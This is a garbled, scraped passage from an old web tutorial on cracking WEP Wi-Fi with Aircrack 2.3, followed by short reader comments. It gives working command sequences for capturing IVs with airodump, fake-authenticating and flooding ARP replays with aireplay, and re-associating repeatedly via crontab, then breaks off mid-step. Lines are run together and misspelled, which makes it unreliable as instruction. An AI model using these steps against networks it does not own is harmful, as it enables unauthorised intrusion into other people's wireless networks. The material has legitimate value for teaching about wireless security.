Aircrack 2.3 (WEP, WPA-PSK Creck)
BSSID STATION PWR Packets ESSID00:A0:B0:40:5C:84 00:04:23:52:80:41 86 4 HOGE
4. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE), and specify 1 to only cature unique WEP IVs. Itsaves space.
# airodump eth0 out 1 1BSSID PWR Beacons # Data CH MB ENC ESSID
00:A0:B0:40:5C:84
87 36 48 1 54 WEP HOGEBSSID STATION PWR Packets ESSID00:A0:B0:40:5C:84
00:04:23:52:80:41
87 38 HOGE
Fake authentication (aireplay) (WEP)
1. We will use airoeplay to inject packets, so we can capture packets easily. Open another console. Copy BSSID andpaste as,
# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 eth012:14:06 Sending Authentication Request12:14:06 Authentication successful12:14:06 Sending Association Request12:14:07
Association successful :-)
If it cannot associate, use station's MAC,
# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h
00:04:23:52:80:41
eth0
Some access points require to reassociate every 20 seconds, otherwise the fake client is considered disconnected. Inthis case, setup the periodic re-association delay:
# aireplay -1
20
-e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
2. Once associated, send packets as following. If you are not associated, you see no send packet.
# aireplay -3 -b 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 -x 600 eth0Saving APR requests in replay_arp-1112-031550.capYou must also start airodump to capture replies.Read 39123 packets (got 1024 APR requests), sent
24543
packets...
3. If it stoped sending, you need to associate again. Consider setup of the periodic re-association delay. I used crontab tore-associate again and again.
How to crack (aircrack) (WEP)
1. Open a new console, and type following command. Aircrack can read the updated file automatically so you can run
http://www.grape-info.com/doc/linux/config/aircrack-2.3.html (2 of 8)3/30/2006 2:36:14 PM
Leave a Comment
Hacking is bad, help me God.
niceeeeeeeeee
good